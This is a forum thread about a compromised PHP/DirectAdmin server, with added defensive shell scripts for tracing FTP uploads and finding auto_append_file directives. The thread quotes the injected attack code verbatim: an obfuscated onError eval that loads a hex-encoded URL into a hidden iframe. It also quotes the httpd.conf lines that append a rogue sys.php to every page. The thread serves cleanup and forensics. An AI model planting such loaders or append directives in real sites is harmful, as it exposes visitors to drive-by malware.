php Infection?

more123 (new member, joined Jan 4, 2011, 2 messages)
My server is CentOS 4 with DA 1.36.2
Apache 2.2.10 Running
DirectAdmin 1.36.2 Running
Exim 4.67 Running
MySQL 5.0.67 Running
Named 9.3.6 Running
ProFTPd 1.3.1 Running
sshd Running
dovecot 1.1.7 Running
Php 5.2.6 Installed
---------------------------------------
Some websites, when running http://domain.com/index.php, show up virus alerts.
I had checked their code, but found nothing.

Yesterday I installed WordPress 3.04, the newest version, and created a new subdomain WP website. It showed virus alerts again. :mad:

I viewed the HTML source and found some code had been added to my index.php:


</body></html>
<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="5765" height="1" width="1"><img src="about:blank" onError='astro=unescape("%27");astru=unescape("%22");sksa=eval("document.getElementById("+astro+"seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"+astro+")+document.getElementById("+astro+"5765"+astro+").id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"1294168884"+astro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.getElementById("seaid").src=sksa' style="width:300;height:300;border:0px;"><iframe id="seaid" src="about:blank"></iframe></div>

But when I reload the index.php, the code disappears. :eek:

Anybody could help?
 
Ever plan on upgrading all of your old software for one? Most of your version replies are old versions of software.
 
I run yum update every day.
exclude=apache* httpd* mod_* mysql* MySQL* da_* *ftp* exim* sendmail* php* bind-chroot*

should I rebuild php?
 
Probably you need to upgrade all PHP applications: especially open-source scripts, CMS, etc.

Find the last modified date of your injected PHP scripts, and find IPs in the FTP logs for those periods. Perhaps your FTP passwords were stolen. Change the passwords for the accounts (DirectAdmin/FTP) with injected files.
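One way to carry out that advice, as an added example that is not code from this thread: list PHP files modified in the last N days under a web root and look up which FTP uploads wrote them in a ProFTPd xferlog (the format ProFTPd 1.3 writes by default). The web root and log path are placeholders, and the demo data at the bottom is constructed here.

```shell
#!/bin/sh
# Added example, not code from the thread. It follows the advice above: list PHP
# files modified recently and correlate them with uploads in a ProFTPd xferlog.
# The web root and xferlog paths are placeholders; the demo data is constructed.

# PHP files under $1 modified less than $2 days ago (find's -mtime counts 24h units).
recent_php_files() {
    find "$1" -type f -name '*.php' -mtime "-$2" | sort
}

# Incoming transfers ('i' in xferlog field 12) that wrote the exact path $2.
# Prints the timestamp, the client IP (field 7) and the FTP user (field 14).
ftp_uploads_of() {
    awk -v target="$2" '$12 == "i" && $9 == target {
        printf "%s %s %s %s %s ip=%s user=%s\n", $1, $2, $3, $4, $5, $7, $14 }' "$1"
}

# Distinct client IPs that uploaded anything: compare these with the site
# owner's usual address before changing the account passwords.
ftp_upload_ips() {
    awk '$12 == "i" { print $7 }' "$1" | sort -u
}

# Report: each recently modified PHP file with the uploads that wrote it.
report() {
    webroot=$1 log=$2 days=$3
    recent_php_files "$webroot" "$days" | while read -r f; do
        mtime=$(stat -c %y "$f" 2>/dev/null || stat -f %Sm "$f")
        printf '== %s (mtime %s)\n' "$f" "$mtime"
        ftp_uploads_of "$log" "$f"
    done
}

# Constructed demo: a fake web root and xferlog in a temp dir (path is printed).
make_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/public_html/wp"
    echo '<?php echo "site"; ?>' > "$d/public_html/index.php"
    echo '<?php echo "blog"; ?>' > "$d/public_html/wp/index.php"
    echo '<?php echo "old"; ?>' > "$d/public_html/old.php"
    touch -t 201001010000 "$d/public_html/old.php"   # a year old: not "recent"
    # xferlog fields: date(5) xfer-secs host bytes file type flag direction mode user ...
    cat > "$d/xferlog" <<EOF
Sun Jan  2 03:14:07 2011 1 203.0.113.45 4096 $d/public_html/index.php a _ i r webuser ftp 0 * c
Sun Jan  2 03:14:09 2011 1 203.0.113.45 512 $d/public_html/wp/index.php a _ i r webuser ftp 0 * c
Mon Jan  3 10:00:00 2011 2 198.51.100.7 4096 $d/public_html/index.php a _ o r webuser ftp 0 * c
EOF
    echo "$d"
}

demo=$(make_demo)
report "$demo/public_html" "$demo/xferlog" 1
```

On a real server, replace the demo call with the site's public_html and the xferlog (often /var/log/xferlog or the per-domain log DirectAdmin keeps); the download on Jan 3 is ignored because only incoming transfers rewrite files. A file with a recent mtime but no matching upload was written some other way (a PHP script, a compromised account on the box), which is the case the later replies about sys.php describe.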
 
cd /usr/local/directadmin/custombuild
./build update
./build clean
./build update_versions
 
@scsi,

We generally build rewrite_confs as well.

Do you not see the need to do that? Or am I missing something? Or causing problems?

Thanks.

Jeff
 
It's bots using FTP that do that kind of injection in most cases. Windows viruses/trojans steal the passwords for FTP accounts stored/cached by FTP clients (e.g. Total Commander) and send them to their master. After that, a bot browsing FTP injects the specified files.
 
Sorry... rewrite_confs; I misremembered. I've edited my post.

Jeff
 
Pretty sure you have a root hack. Check /usr/local/lib/php
for a file called sys.php.
Need to add this: in your httpd.conf, look for this and remove the 2 lines starting with php_admin_value:
</VirtualHost>
# php_admin_value error_reporting 0
# php_admin_value auto_append_file /usr/local/lib/php/sys.php
###</IfDefine>
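A check for the mechanism described in this post, as an added example that is not code from the thread: a php_admin_value auto_append_file (or auto_prepend_file) directive makes PHP include the named file on every request, which is how a single sys.php gets injected into every page. The script scans a configuration tree for such directives, ignores commented-out ones, and reports whether the referenced file still exists. The config directory is a placeholder and the demo configuration is constructed here.

```shell
#!/bin/sh
# Added example, not from the thread. Scans Apache/PHP configuration for live
# auto_append_file / auto_prepend_file settings (the mechanism that made the
# injected sys.php run on every request) and checks whether the referenced files
# exist. The config directory is a placeholder; the demo config is constructed.

# Lines setting auto_append_file or auto_prepend_file under $1, as file:line:text,
# with commented-out lines ('#' for httpd.conf, ';' for php.ini) dropped.
find_append_directives() {
    grep -rnE 'auto_(ap|pre)pend_file' "$1" 2>/dev/null \
        | grep -vE '^[^:]*:[0-9]+:[[:space:]]*[#;]' || true
}

# For each live directive print LIVE/MISSING, the referenced path and its size,
# so a file that was already deleted (directive left behind) still shows up.
check_paths() {
    find_append_directives "$1" | while IFS= read -r line; do
        path=$(printf '%s\n' "$line" | sed -E 's/.*[[:space:]=]//')
        [ -n "$path" ] || continue          # "auto_prepend_file =" : setting cleared
        if [ -f "$path" ]; then
            printf 'LIVE %s (%s bytes) <- %s\n' "$path" "$(wc -c < "$path" | tr -d ' ')" "$line"
        else
            printf 'MISSING %s <- %s\n' "$path" "$line"
        fi
    done
}

# Constructed demo: an httpd.conf with a live and a commented directive, a php.ini
# with the setting cleared, and an .htaccess pointing at a file that is gone.
make_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/lib/php" "$d/etc/httpd/conf" "$d/public_html"
    echo '<?php /* constructed stand-in for an injected appender */ ?>' > "$d/lib/php/sys.php"
    cat > "$d/etc/httpd/conf/httpd.conf" <<EOF
<VirtualHost *:80>
    DocumentRoot /home/user/domains/domain.com/public_html
</VirtualHost>
php_admin_value error_reporting 0
php_admin_value auto_append_file $d/lib/php/sys.php
# php_admin_value auto_append_file /usr/local/lib/php/sys.php
EOF
    cat > "$d/etc/php.ini" <<'EOF'
; auto_append_file =
auto_prepend_file =
EOF
    printf 'php_value auto_prepend_file /nonexistent/dir/x.php\n' > "$d/public_html/.htaccess"
    echo "$d"
}

demo=$(make_demo)
check_paths "$demo"
```

Run it over /etc/httpd (or wherever DirectAdmin keeps the Apache config), the php.ini in use and the DocumentRoots, since .htaccess files can set the same values. The text scan only shows what the files say; `php -i | grep -E 'auto_(ap|pre)pend_file'` shows what the CLI PHP actually has in effect, and the error_reporting 0 directive in the post is there to hide any warnings the appended file would produce.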